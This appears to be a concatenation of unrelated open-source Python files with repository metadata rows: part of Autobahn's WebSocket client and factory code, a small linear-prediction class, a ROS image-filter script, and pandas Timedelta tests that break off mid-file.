maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSocket protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performaing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSocket protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSocket.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake (or proxy connect).
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
if not self.isServer and self.factory.proxy is not None:
## start by doing a HTTP/CONNECT for explicit proxies
self.startProxyConnect()
else:
## immediately start with the WebSocket opening handshake
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def startProxyConnect(self):
"""
Connect to explicit proxy.
"""
## construct proxy connect HTTP request
##
request = "CONNECT %s:%d HTTP/1.1\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "\x0d\x0a"
if self.debug:
log.msg(request)
self.sendData(request)
def processProxyConnect(self):
"""
Process HTTP/CONNECT response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % http_response_data)
## extract HTTP status line and headers
##
(http_status_line, http_headers, http_headers_cnt) = parseHttpHeader(http_response_data)
## validate proxy connect response
##
if self.debug:
log.msg("received HTTP status line for proxy connect request : %s" % str(http_status_line))
log.msg("received HTTP headers for proxy connect request : %s" % str(http_headers))
## Response Line
##
sl = http_status_line.split()
if len(sl) < 2:
return self.failProxyConnect("Bad HTTP response status line '%s'" % http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failProxyConnect("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failProxyConnect("Bad HTTP status code ('%s')" % sl[1].strip())
if not (status_code >= 200 and status_code < 300):
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failProxyConnect("HTTP proxy connect failed (%d%s)" % (status_code, reason))
## Ok, got complete response for HTTP/CONNECT, remember rest (if any)
##
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_CONNECTING
## process rest of buffered data, if any
##
if len(self.data) > 0:
self.consumeData()
## now start WebSocket opening handshake
##
self.startHandshake()
def failProxyConnect(self, reason):
"""
During initial explicit proxy connect, the server response indicates some failure and we drop the
connection.
"""
if self.debug:
log.msg("failing proxy connect ('%s')" % reason)
self.dropConnection(abort = True)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSocket opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## this seems to prohibit some non-compliant proxies from removing the
## connection "Upgrade" header
## See also:
## http://www.ietf.org/mail-archive/web/hybi/current/msg09841.html
## http://code.google.com/p/chromium/issues/detail?id=148908
##
request += "Pragma: no-cache\x0d\x0a"
request += "Cache-Control: no-cache\x0d\x0a"
## optional, user supplied additional HTTP headers
##
for uh in self.factory.headers.items():
request += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
## Safari does NOT set Content-Length, even though the body is
## non-empty, and the request unchunked. We do it.
## See also: http://www.ietf.org/mail-archive/web/hybi/current/msg02149.html
request += "Content-Length: %s\x0d\x0a" % len(self.websocket_key3)
## First two keys.
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
## Write HTTP request body for Hixie-76
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSocket opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failHandshake("WebSocket connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extension, but if we did, we needed
## to set self.websocket_extensions_in_use here, and don't fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrical to server-side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self, url = None, origin = None, protocols = [], useragent = "AutobahnPython/%s" % __version__, headers = {}, proxy = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST provide URL either here or set using
:meth:`autobahn.websocket.WebSocketClientFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSocket opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSocket opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnWebSocket/x.x.x").
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param proxy: Explicit proxy server to use (hostname:port or IP:port), e.g. "192.168.1.100:8080".
:type proxy: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent, headers, proxy)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None, headers = {}, proxy = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
self.headers = headers
self.proxy = proxy
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSocket protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSocket draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
| gpl-3.0 | 8,117,406,587,043,622,000 | 37.000746 | 214 | 0.601589 | false |
Calvinxc1/Data_Analytics | old versions/analysis_classes/Cluster_Control/Cluster_IO/Predict_Cluster/predictor.py | 1 | 1655 | #%% Libraries
import numpy as np
import root_funcs as rf
#%% predict_linear class (Module for Process_Node - Predict)
class predict_linear(object):
__lookup_dict = {
'beta_init': {
'zeros': ('Cluster_Control.Cluster_IO.Predict_Cluster.beta_init', 'beta_zeros')
},
'learn_rate': {
'partial_hessian': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'partial_hessian'),
'manual': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'manual')
}
}
__class_type = 'predict_linear'
def __init__(self, beta_init_type = 'zeros', learn_rate_type = 'partial_hessian'):
self.__betas = np.empty((0, 0))
self.__subclasses = {}
self.set_subclass('beta_init', beta_init_type)
self.set_subclass('learn_rate', learn_rate_type)
def get_type(self):
return self.__class_type
def set_subclass(self, subitem, subitem_type, *args, **kwargs):
self.__subclasses[subitem] = (subitem_type, rf.upload_module(self.__lookup_dict[subitem][subitem_type])(*args, **kwargs))
def call_submethod(self, subitem, submethod, *args, **kwargs):
return getattr(self.__subclasses[subitem][1], submethod)(*args, **kwargs)
def get_subclass_type(self, subitem):
return self.__subclasses.get(subitem, (None))[0]
def init_betas(self, feature_count):
self.__betas = self.call_submethod('beta_init', 'initialize', feature_count)
def predict(self, input_data):
return np.dot(input_data, self.__betas)
| gpl-3.0 | 1,337,883,345,496,032,800 | 35.8 | 129 | 0.598187 | false |
OSUrobotics/privacy-interfaces | filtering/text_filters/scripts/try_something_new.py | 1 | 1266 | #!/usr/bin/env python
import rospy
from cv_bridge import CvBridge
import cv, cv2
import numpy
from sensor_msgs.msg import Image
bridge = CvBridge()
pub = rospy.Publisher("/image_out", Image)
def image_callback(image):
""" Applies a new filter to the image and displays the result. """
image_cv = bridge.imgmsg_to_cv(image)
image_cv2 = numpy.asarray(image_cv)
# Downsample the grayscale image
gray = image_cv2[:, :, 0]/3 + image_cv2[:, :, 1]/3 + image_cv2[:, :, 2]/3
gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
# Make new 3-channel image
image_new = numpy.zeros((gray.shape[0], gray.shape[1], image_cv2.shape[2]))
image_new[:, :, 0] = image_new[:, :, 1] = image_new[:, :, 2] = gray
image_new = image_new.astype('uint8')
print image_new.shape
# Re-publish
image.data = bridge.cv_to_imgmsg(cv.fromarray(image_new),
encoding=image.encoding).data
image.width = image_new.shape[1]
image.height = image_new.shape[0]
image.step = image.width * 3
pub.publish(image)
if __name__ == "__main__":
rospy.init_node("new_filter")
rospy.Subscriber("/camera/rgb/image_color", Image, image_callback)
rospy.spin()
| mit | -8,800,374,811,631,611,000 | 29.142857 | 79 | 0.621643 | false |
zfrenchee/pandas | pandas/tests/scalar/test_timedelta.py | 1 | 33010 | """ test the scalar Timedelta """
import pytest
import numpy as np
from datetime import timedelta
import pandas as pd
import pandas.util.testing as tm
from pandas.core.tools.timedeltas import _coerce_scalar_to_timedelta_type as ct
from pandas import (Timedelta, TimedeltaIndex, timedelta_range, Series,
to_timedelta, compat)
from pandas._libs.tslib import iNaT, NaT
class TestTimedeltaArithmetic(object):
_multiprocess_can_split_ = True
def test_arithmetic_overflow(self):
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + pd.Timedelta(13 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + timedelta(days=13 * 19999)
def test_ops_error_str(self):
# GH 13624
td = Timedelta('1 day')
for left, right in [(td, 'a'), ('a', td)]:
with pytest.raises(TypeError):
left + right
with pytest.raises(TypeError):
left > right
assert not left == right
assert left != right
def test_to_timedelta_on_nanoseconds(self):
# GH 9273
result = Timedelta(nanoseconds=100)
expected = Timedelta('100ns')
assert result == expected
result = Timedelta(days=1, hours=1, minutes=1, weeks=1, seconds=1,
milliseconds=1, microseconds=1, nanoseconds=1)
expected = Timedelta(694861001001001)
assert result == expected
result = Timedelta(microseconds=1) + Timedelta(nanoseconds=1)
expected = Timedelta('1us1ns')
assert result == expected
result = Timedelta(microseconds=1) - Timedelta(nanoseconds=1)
expected = Timedelta('999ns')
assert result == expected
result = Timedelta(microseconds=1) + 5 * Timedelta(nanoseconds=-2)
expected = Timedelta('990ns')
assert result == expected
pytest.raises(TypeError, lambda: Timedelta(nanoseconds='abc'))
def test_ops_notimplemented(self):
class Other:
pass
other = Other()
td = Timedelta('1 day')
assert td.__add__(other) is NotImplemented
assert td.__sub__(other) is NotImplemented
assert td.__truediv__(other) is NotImplemented
assert td.__mul__(other) is NotImplemented
assert td.__floordiv__(other) is NotImplemented
def test_timedelta_ops_scalar(self):
# GH 6808
base = pd.to_datetime('20130101 09:01:12.123456')
expected_add = pd.to_datetime('20130101 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta(10, unit='s'), timedelta(seconds=10),
np.timedelta64(10, 's'),
np.timedelta64(10000000000, 'ns'),
pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
base = pd.to_datetime('20130102 09:01:12.123456')
expected_add = pd.to_datetime('20130103 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta('1 day, 00:00:10'),
pd.to_timedelta('1 days, 00:00:10'),
timedelta(days=1, seconds=10),
np.timedelta64(1, 'D') + np.timedelta64(10, 's'),
pd.offsets.Day() + pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
def test_ops_offsets(self):
td = Timedelta(10, unit='d')
assert Timedelta(241, unit='h') == td + pd.offsets.Hour(1)
assert Timedelta(241, unit='h') == pd.offsets.Hour(1) + td
assert 240 == td / pd.offsets.Hour(1)
assert 1 / 240.0 == pd.offsets.Hour(1) / td
assert Timedelta(239, unit='h') == td - pd.offsets.Hour(1)
assert Timedelta(-239, unit='h') == pd.offsets.Hour(1) - td
def test_unary_ops(self):
td = Timedelta(10, unit='d')
# __neg__, __pos__
assert -td == Timedelta(-10, unit='d')
assert -td == Timedelta('-10d')
assert +td == Timedelta(10, unit='d')
# __abs__, __abs__(__neg__)
assert abs(td) == td
assert abs(-td) == td
assert abs(-td) == Timedelta('10d')
def test_binary_ops_nat(self):
td = Timedelta(10, unit='d')
assert (td - pd.NaT) is pd.NaT
